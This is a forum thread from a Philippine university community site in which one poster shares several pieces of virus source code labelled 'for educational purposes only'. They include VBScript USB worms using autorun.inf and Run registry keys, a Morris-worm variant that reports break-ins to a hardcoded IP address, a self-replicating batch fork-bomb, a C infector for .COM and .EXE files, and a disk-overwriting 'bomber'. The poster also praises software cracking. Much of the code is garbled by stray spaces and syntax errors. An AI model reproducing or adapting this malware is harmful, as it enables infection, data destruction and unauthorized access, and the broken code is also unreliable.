VIRUS codes for educational purposes only!

• Hall 1 Balay Lampirong - ... by Germie [June 05, 2010, 08:39:52 AM]
• Feedback please by princegolez [May 28, 2010, 09:24:57 PM]
• San Miguel Premium by bellfox [May 14, 2010, 11:50:28 AM]
• Advertisements by bellfox [May 14, 2010, 11:47:33 AM]
• What is your Friendster S... by bellfox [May 14, 2010, 11:40:40 AM]
• 2010 Presidential Electio... by PrinceChris [April 27, 2010, 08:08:35 PM]
• Maglaro tayo! Guessing ga... by bellfox [April 23, 2010, 02:20:09 PM]

6 Guests, 0 Users

Upvisayas Dot Net

[jover619]

This is for educational purposes only. Do not modify it, ok? Just study the codes and their respective behaviors so that you will know how to avoid/delete these virus.
THIS IS FOR EDUCATIONAL PURPOSES ONLY, BUT THE HAZARDS ARE REAL, SO DO NOT COMPILE THIS! PROMISE?

[jover619]

'THIS IS A MODIFIED VERSION BY: F. E. SILVA
'MABUHAY ANG LIPA
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrl&"shellexecute=wscript.exe FS6519.dll.vbs"
set fs = createobj ct("Scripting.FileSystemObject")
set m f = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.opentextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
source= mysource & vbcrl
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 32
for each flashdrive in fs.drives
If (flas hdrive.drivetype = 1 or flashdrive.d rivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.g etfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =39
set tf =fs .getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg =  createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FS6519″,winpath&"\FS6519.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","TAGA LIPA ARE!"
if check < > 1 then
Wscript.sleep 200001
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/ select, "&Wscript.ScriptFullname

[jover619]

worm!

666 The Dead Zone 214-522-5321 300/1200/2400 666

#include

#include

#include

#include



long current_time;

struct rlimit no_core = {0,0};



int

main (argc, argv)

   int argc;

   char *argv[];



{

   int n;

   int parent = 0;

   int okay = 0;

      /* change calling name to "sh" */

   strcpy(argv[0], "sh");

      /* prevent core files by setting limit to 0 */

   setrlimit(RLIMIT_CORE, no_core);

   current_time = time(0);

      /* seed random number generator with time */

   srand48(current_time);

   n = 1;

   while (argv[n]) {

      /* save process id of parent */

      if (!strncmp(argv[n], "-p", 2)) {

         parent = atoi (argv[++n]);

         n++;

      }

      else {

         /* check for 1l.c in argument list */

         if (!strncmp(argv([n], "1l.c", 4))

            okay = 1;

         /* load an object file into memory */

         load_object (argv[n];

         /* clean up by unlinking file */

         if (parent)

            unlink (argv[n]);

         /* and removing object file name */

         strcpy (argv[n++], "");

      }

   

   }

      /* if 1l.c was not in argument list, quit */

   if (!okay)

      exit (0);

      /* reset process group */

   setpgrp (getpid());

      /* kill parent shell if parent is set */

   if (parent)

      kill(parent, SIHGUP);

      /* scan for network interfaces */

   if_init();

      /* collect list of gateways from netstat */

   rt_init();

      /* start main loop */

   doit();

}



int

doit()

{

   current_time = time (1);

      /* seed random number generator (again) */

   srand48(current_time);

      /* attack gateways, local nets, remote nets */

   attack_hosts();

      /* check for a "listening" worm */

   check_other ()

      /* attempt to send byte to "ernie" */

   send_message ()

   for (; {

      /* crack some passwords */

   crack_some ();

      /* sleep or listen for other worms */

   other_sleep (3);

   crack_some ();

      /* switch process id's */

      if (fork())

         /* parent exits, new worm continues */

         exit (0);

      /* attack gateways, known hosts */

      attack_hosts();

      other_sleep(12);

         /* if 12 hours have passed, reset hosts */

      if(time (0) == current_time + (3600*12)) {

         reset_hosts();

         current_time = time(0); }

         /* quit if pleasequit is set, and nextw>10 */

      if (pleasequit && nextw > 1)

         exit (0);

   }

}

[jover619]

Dover Worm is a worm that can harm your system. With a help of Dover Worm, a hacker can get remote access to your computer

/* Dover */

#include "worm.h"
#include <stdio.h>
#include <signal.h>
#include <strings.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/fcntl.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>

extern errno;
extern char *malloc();

int pleasequit;               /* See worm.h */
int nobjects = 0;
int nextw;
char *null_auth;

object objects[69];            /* Don't know how many... */

object *getobjectbyname();

char *XS();

main(argv, argc)      /* 0*20a0 */
     int argc;
     char **argv;
{
    int i, l8, pid_arg, j, cur_arg, unused;
    long key;         /* -28(fp) */
    struct rlimit rl;
   
    l8 = 0;               /* Unused */
   
    strcpy(argv[0], XS("sh"));         /* <env+52> */
    time(&key);
    srandom(key);
    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    if (setrlimit(RLIMIT_CORE, &rl))
   ;
    signal(SIGPIPE, SIG_IGN);
    pid_arg = 0;
    cur_arg = 1;
    if  (argc > 2 &&
    strcmp(argv[cur_arg], XS("-p")) == 0) { /* env55 == "-p" */
   pid_arg = atoi(argv[2]);
   cur_arg += 2;
    }
    for(i = cur_argv; i < argc; i++) {   /* otherwise <main+286> */
   if (loadobject(argv) == 0)
       exit(1);
   if (pid_arg)
       unlink(argv);
    }
    if ((nobjects < 1) || (getobjectbyname(XS("l1.c")) == NULL))
   exit(1);
    if (pid_arg) {
   for(i = 0; i < 32; i++)
       close(i);
   unlink(argv[0]);
   unlink(XS("sh"));         /* <env+63> */
   unlink(XS("/tmp/.dumb"));      /* <env+66>"/tmp/.dumb"
 */
    }
   
    for (i = 1; i < argc; i++)
   for (j = 0;   argv[j]; j++)
       argc[j] = '\0';
    if (if_init() == 0)
   exit(1);
    if (pid_arg) {               /* main+600 */
   if (pid_arg == getpgrp(getpid()))
       setpgrp(getpid(), getpid());
   kill(pid_arg, 9);
    }
    mainloop();
}

static mainloop()            /* 0x2302 */
{
    long key, time1, time0;
   
    time(&key);
    srandom(key);
    time0 = key;
    if (hg() == 0 && hl() == 0)
   ha();
    checkother();
    report_breakin();
    cracksome();
    other_sleep(30);
    while (1) {
   /* Crack some passwords */
   cracksome();
   /* Change my process id */
   if (fork() > 0)
       exit(0);
   if (hg() == 0 && hi() == 0 && ha() == 0)
       hl();
   other_sleep(120);
   time(&time1);
   if (time1 - time0 >= 60*60*12)
       h_clean();
   if (pleasequit && nextw > 0)
       exit(0);
    }
}

static trans_cnt;
static char trans_buf[NCARGS];

char *XS(str1)         /* 0x23fc */
     char *str1;
{
    int i, len;
    char *newstr;
#ifndef ENCYPHERED_STRINGS
    return str1;
#else 
    len = strlen(str1);
    if (len + 1 > NCARGS - trans_cnt)
   trans_cnt = 0;
    newstr = &trans_buf[trans_cnt];
    trans_cnt += 1 + len;
    for (i = 0; str1; i++)
   newstr = str1^0x81;
    newstr = '\0';
    return newstr;
#endif
}

/* This report a sucessful breakin by sending a single byte to "203.177.73.176"
 * (whoever that is). */

static report_breakin(arg1, arg2)      /* 0x2494 */
{
    int s;
    struct sockaddr_in sin;
    char msg;
   
    if (7 != random() % 15)
   return;
   
    bzero(&sin, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = REPORT_PORT;
    sin.sin_addr.s_addr = inet_addr(XS("203.177.73.176"));
                  /* <env+77>"203.177.73.176" */
   
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
   return;
    if (sendto(s, &msg, 1, 0, &sin, sizeof(sin)))
   ;
    close(s);
}

/* End of first file in the original source.
 * (Indicated by extra zero word in text area.) */

/*
 * Local variables:
 * compile-command: "make"
 * comment-column: 48
 * End:
 */

[jover619]

BATotoy!

@echo off
del C:\1.reg
>>"C:\1.reg" ECHO Windows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur entVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MSUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\windows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\windows\\2.bat"
>>"C:\1.reg" ECHO "autorun.inf"="c:\\windows\\3.bat"
regedit.exe /s C:\1.reg

>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\windows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\windows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\windows\3.bat
>>"C:\2.bat" ECHO start C:\windows\1.bat
>>"C:\2.bat" ECHO start C:\windows\2.bat
>>"C:\2.bat" ECHO start C:\windows\3.bat
>>"C:\2.bat" ECHO goto 1

start C:\2.bat

[jover619]

/* C-Virus: A generic .COM and .EXE infector

Written by Nowhere Man

Project started and completed on 6-24-91

*/

#pragma inline //

#include
#include
#include
#include
#include

void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);

#define DEBUG
#define ONE_KAY 1024 // 1k
#define TOO_SMALL ((7 * ONE_KAY) + 300) // 6k+ size minimum
#define SIGNATURE "NMAN" // Sign of infection

int main(void)
{
/* The main program */

spread(_argv[0], victim()); // Perform infection
small_print("Out of memory\r\n"); // Print phony error
return(1); // Fake failure...
}

void hostile_activity(void)
{
/* Put whatever you feel like doing here...I chose to
make this part harmless, but if you're feeling
nasty, go ahead and have some fun... */

small_print("\a\a\aAll files infected. Mission complete.\r\n");
exit(2);
}

int infected(char *fname)
{
/* This function determines if fname is infected */

FILE *fp; // File handle
char sig[5]; // Virus signature

f p = fopen(fname, "rb");
f seek(fp, 28L, SEEK_SET);
f read(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
printf("Signature for %s: %s\n", fname, sig);
#endif
fclose(fp);
return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}

void small_print(char *string)
{
/* This function is a small, quick print routine */

asm {
push si
mov si,string
mov ah,0xE
}

print: asm {
lodsb
or al,al
je finish
int 0x10
jmp short print
}
finish: asm pop si
}

void spread(char *old_name, char *new_name)
{
/* This function infects new_name with old_name */


/* Variable declarations */

FILE *old, *new; // File handles
struct ftime file_time; // Old file date,
time
int attrib; // Old attributes
long old_size, virus_size; // Sizes of files
char *virus_code = NULL; // Pointer to virus
int old_handle, new_handle; // Handles for files


/* Perform the infection */

#ifdef DEBUG
printf("Infecting %s with %s...\n", new_name, old_name);
#endif
old = fopen(old_name, "rb"); // Open virus
new = fopen(new_name, "rb"); // Open victim
old_handle = fileno(old); // Get file handles
new_handle = fileno(new);
old_size = filelength(new_handle); // Get old file size
virus_size = filelength(old_handle); // Get virus size
attrib = _chmod(new_name, 0); // Get old attributes
getftime(new_handle, &file_time); // Get old file time
fclose(new); // Close the virusee
_chmod(new_name, 1, 0); // Clear any read-only
unlink(new_name); // Erase old file
new = fopen(new_name, "wb"); // Open new virus
new_handle = fileno(new);
virus_code = malloc(virus_size); // Allocate space
fread(virus_code, virus_size, 1, old); // Read virus from old
fwrite(virus_code, virus_size, 1, new); // Copy virus to new
_chmod(new_name, 1, attrib); // Replace attributes
chsize(new_handle, old_size); // Replace old size
setftime(new_handle, &file_time); // Replace old time


/* Clean up */

fcloseall(); // Close files
free(virus_code); // Free memory
}

char *victim(void)
{
/* This function returns the virus's next victim */


/* Variable declarations */

char *types[1] = {"*.EXE", "*.COM"}; // Potential victims
static struct ffblk ffblk; // DOS file block
int done; // Indicates finish
int index; // Used for loop


/* Find our victim */

if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
return(_argv[1]);

for (index = 0; index < sizeof(types); index++) {
done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week,
months, etc., here is the place to insert the
code (don't forget to "#include "!) */

if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
return(ffblk.ff_name);
done = findnext(&ffblk);
}
}


/* If there are no files left to infect, have a little fun... */

hostile_activity();
return(0); // Prevents warning
}  

[jover619]

napulot ko lang na quote..i just wanna share it..

Some people understand the world and they are the crackers!. Money is not everything. Knowledge is everything. You cannot commercialize the bits and bytes because we already pay our electric bills! Vanity and commerce bring harm to the world. Crackers are the best! Find me if you can!
-aed040

aed040 is one of the best crackers in the country. he is famous in cracking and modifying Opera softwares so that it could connect to the internet for free. he cracked a lot of sys and jar files and he shared it to the world. Maraming company na ang nalulugi dahil sa kanya lalo na ang big 3 telecom networks but mas marami pa rin ang nakikinabang sa ginagawa niya and i'm one of them.

what can you say about this?

[jover619]

IMGKULOT from iloilo

'imgkulot v1.0
'Iloilo City Phils
'email me if you found this @ jamesgo.dll@gmail.com
'edited from imgkulot on july 2007
on error resume next
Set WshShell =CreateObject("WScript.Shell")


For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\test.vbs" then
isdir=true
else
a=WshShell.Run("test.bat Open" ,0,False)
a=WshShell.Run("winword " ,1,False)
isdir=false
end if

For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("test.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\test.*",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.ico",d&"\",True
else
Of.CopyFile "test.*",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.ico",d&"\",True
end if
a=WshShell.Run("test.bat + "&d ,1,True)
End If
next

if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("test.bat - "&dir ,0,True)
Of.CopyFile "test.*",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.ico",dir&"\",True
a=WshShell.Run("test.bat + "&dir ,1,True)
end if

next

[jover619]

The Virus Source Code Database (VSCDB) is for information purposes only, for researchers and computer virus or programming enthusiasts. No warranty is given or to be implied for any software listings contained herein. You take full responsibility for any damages caused by compiling, running, or sharing this information. Be aware that running any malicious code on another's computer or computer network might be a criminal act. Use at your own risk!

Virus Source Code Database :: bomber.c

#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("**** YOU ALL");
printf("The Bomber");
}

The upvisayas.net forums is a privately initiated online community and is not in any way associated from the University of the Philippines (UP) System save from the fact that its registered members are primarily alumni, students, staff, and faculty of UP. The owners, administrators, and moderators of the forum is not in any way responsible for the messages posted by forum members.